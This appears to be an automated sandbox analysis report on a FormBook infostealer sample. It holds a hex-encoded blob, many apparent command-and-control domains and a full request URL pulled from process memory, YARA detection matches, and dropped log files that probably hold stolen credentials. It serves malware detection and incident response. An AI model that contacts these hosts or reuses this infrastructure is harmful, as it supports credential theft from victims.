6c 73 6f 74 77 49 6d 45 76 31 6e 69 59 57 39 71 77 63 38 63 6d 47 76 58 4f 4e 39 6f 59 78 63 4a 44 77 36 31 58 65 32 4b 69 6e 37 4e 7a 33 74 6c 4d 36 6c 59 38 30 48 64 4a 79 59 43 35 6a 74 72 62 71 36 6c 52 48 28 68 38 50 76 37 67 37 44 65 53 42 46 35 31 76 37 59 44 42 68 57 61 79 6f 45 5a 73 33 41 42 68 45 69 50 79 6d 78 39 69 43 4c 74 52 70 41 6e 79 62 78 7e 38 39 64 6d 6a 32 77 28 56 53 49 58 64 7e 4e 62 65 37 70 69 31 70 79 6c 62 34 51 58 6e 63 37 79 59 67 41 67 63 43 2d 4c 63 57 36 53 55 71 70 49 69 56 74 31 49 35 51 39 77 62 6e 71 58 73 77 42 54 55 66 4c 67 66 71 53 42 53 6a 4e 33 61 4d 4e 58 42 47 5a 66 33 61 31 6a 41 71 55 54 4a 4f 48 55 7e 58 57 50 43 35 7a 54 72 67 75 55 32 6f 4a 7a 43 2d 31 7a 52 4b 41 76 72 50 7a 54 70 73 63 72 31 41 6f 59 30 53 7e 32 62 6b 31 6d 6c 6a 78 33 30 34 75 4a 34 30 6c 71 69 78 43 64 5a 6f 67 4a 6b 77 53 36 52 58 36 48 62 4e 7e 50 6e 66 68 65 54 6a 77 70 35 67 49 4b 71 31 66 4e 58 43 78 31 53 6c 6f 77 61 61 6d 4e 4f 54 56 2d 35 4d 55 4b 52 77 6e 62 4a 5a 44 63 6b 46 64 33 31 54 77 6b 76 6a 50 53 56 6e 38 36 67 66 6d 67 59 59 57 65 7a 66 75 4e 62 4c 59 6b 6b 4f 62 5f 4e 74 30 75 61 35 46 69 34 32 6b 35 5a 30 44 41 54 68 32 66 4d 6f 35 42 48 4a 36 31 57 63 78 47 68 64 72 78 38 69 57 6e 58 32 45 79 5a 35 6a 53 30 30 32 6c 33 49 42 62 6b 37 57 54 77 30 32 4a 4f 52 49 68 6f 32 46 6b 5a 41 75 4b 33 62 33 4f 39 57 69 56 35 69 4b 66 4a 38 43 2d 6b 4d 33 62 35 36 73 4c 65 50 72 71 6c 50 65 34 32 39 74 6d 55 59 57 32 4e 59 30 73 5a 71 78 31 6a 61 59 5f 5a 34 78 46 53 5f 32 35 4e 6a 55 55 73 35 7a 61 76 52 6e 5a 30 70 53 55 76 4e 58 76 4a 31 46 45 42 34 43 4c 34 78 51 4b 4f 55 6c 31 47 53 6e 4f 38 5a 73 5a 75 31 61 37 53 72 56 4d 54 58 59 4a 46 44 31 6e 79 6d 63 4b 48 69 67 47 79 37 64 6c 28 59 39 5f 6b 72 44 4f 64 44 56 61 38 4a 58 55 6d 58 31 74 65 38 42 38 49 51 49 45 4e 47 35 4e 4e 34 75 44 71 59 7a 62 6c 73 58 56 44 4c 63 45 74 78 35 41 4b 6a 36 6e 65 31 58 6a 42 73 56 31 6d 31 31 71 59 52 73 59 58 74 6c 48 55 6d 61 56 4a 58 76 4b 44 39 7a 61 75
Urls found in memory or binary dataShow sources
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.599845164.0000000002630000.00000004.00000001.sdmpString found in binary or memory: http://ns.adob1
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.39pk3ol88h.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.39pk3ol88h.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.39pk3ol88h.com/un/www.glonetsupplies.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.39pk3ol88h.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.advantahc.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.advantahc.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.advantahc.com/un/www.yapzhiying.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.advantahc.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.assomusicaleincarville.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.assomusicaleincarville.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.assomusicaleincarville.com/un/www.rozaswar.net
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.assomusicaleincarville.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.ethansung.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.ethansung.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.ethansung.com/un/www.zhishengda.net
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.ethansung.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.glonetsupplies.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.glonetsupplies.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.glonetsupplies.com/un/www.transferas.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.glonetsupplies.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.molestuk.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.molestuk.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.molestuk.com/un/S
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.molestuk.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.natashadenness.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.natashadenness.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.natashadenness.com/un/www.assomusicaleincarville.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.natashadenness.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.rozaswar.net
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.rozaswar.net/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.rozaswar.net/un/www.tactilon.online
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.rozaswar.netReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.starsaunainstallations.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.starsaunainstallations.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.starsaunainstallations.com/un/www.ethansung.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.starsaunainstallations.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.tactilon.online
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.tactilon.online/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.tactilon.online/un/www.advantahc.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.tactilon.onlineReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.transferas.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.transferas.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.transferas.com/un/www.websitenhatrang.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.transferas.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp, WWAHost.exe, 00000003.00000002.1229698588.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://www.travelbytravant.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp, WWAHost.exe, 00000003.00000002.1229698588.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://www.travelbytravant.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.travelbytravant.com/un/www.starsaunainstallations.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.travelbytravant.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.vrtravelers.net
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.vrtravelers.net/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.vrtravelers.net/un/www.39pk3ol88h.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.vrtravelers.netReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.websitenhatrang.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.websitenhatrang.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.websitenhatrang.com/un/www.travelbytravant.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.websitenhatrang.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.yapzhiying.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.yapzhiying.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.yapzhiying.com/un/www.molestuk.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.yapzhiying.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.zhishengda.net
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.zhishengda.net/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.zhishengda.net/un/www.natashadenness.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.zhishengda.netReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: WWAHost.exe, 00000003.00000002.1224402013.00000000007F8000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
Source: WWAHost.exe, 00000003.00000002.1229851131.0000000003D5F000.00000004.00000001.sdmpString found in binary or memory: https://www.starsaunainstallations.com/un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjsFEYD
Source: WWAHost.exe, 00000003.00000002.1229851131.0000000003D5F000.00000004.00000001.sdmpString found in binary or memory: https://www.starsaunainstallations.com/un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjs

E-Banking Fraud:

barindex
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malwareShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeDropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogri.iniJump to dropped file
Source: C:\Windows\SysWOW64\WWAHost.exeDropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogrf.iniJump to dropped file
Source: C:\Windows\SysWOW64\WWAHost.exeDropped file: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogrv.iniJump to dropped file
Malicious sample detected (through community Yara rule)Show sources
Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1229429028.00000000038EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
